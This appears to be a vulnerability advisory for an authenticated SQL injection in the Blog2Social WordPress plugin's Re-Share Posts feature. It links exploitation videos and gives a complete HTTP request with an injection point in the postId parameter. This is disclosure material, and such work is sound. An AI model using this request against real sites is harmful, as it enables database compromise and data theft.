Blog2Social: Social Media Auto Post & Scheduler < 6.3.1 - Authenticated SQL Injection

SQL Injection in the Blog2Social plugin 6.3.0 for WordPress exists via Re-Share Posts feature.

PoC

Please refer to the video below for steps to reproduce and demonstration of automatic exploit with sqlmap. - Mega.nz: https://mega.nz/file/mt1gFYTK#e3XkA-zY0cCApTYlLZktRZ4Q4vchVhbPsNqQC6CKORo - Drive: https://drive.google.com/file/d/1-KP_j7Ke4LbdvNi2sTIVpkiu3NcFENPN/view?usp=sharing Payload: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://example.com/wp-admin/admin.php?page=blog2social-repost Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 70 Origin: http://example.com DNT: 1 Connection: close Cookie: wordpress_28367124e365cebea6bbf69dfaa9f31b=author1%7C1590633495%7C5Yy7rTkEQl35520rsnZ7xxDTqB742szKwX4RbO5Sh3b%7Ccb6e4516c091f556a9aa62007079d0186b96e19aeacb9a3e16c32b9d472adc23; PHPSESSID=sie1r62oh0f61k0fhg8fqqbf5p; wordpress_test_cookie=WP+Cookie+check; pmpro_visit=1; wordpress_logged_in_28367124e365cebea6bbf69dfaa9f31b=author1%7C1590633495%7C5Yy7rTkEQl35520rsnZ7xxDTqB742szKwX4RbO5Sh3b%7C29ad269c08cf55f201b09941e94d00a8d6e6d41613d434b7ff73bf8fcc6e303f; wp-settings-2=editor%3Dhtml; wp-settings-time-2=1590460695 action=b2s_delete_re_post_sched&postId;=INJECT_HERE&b2s;_security_nonce=1ee6f55c64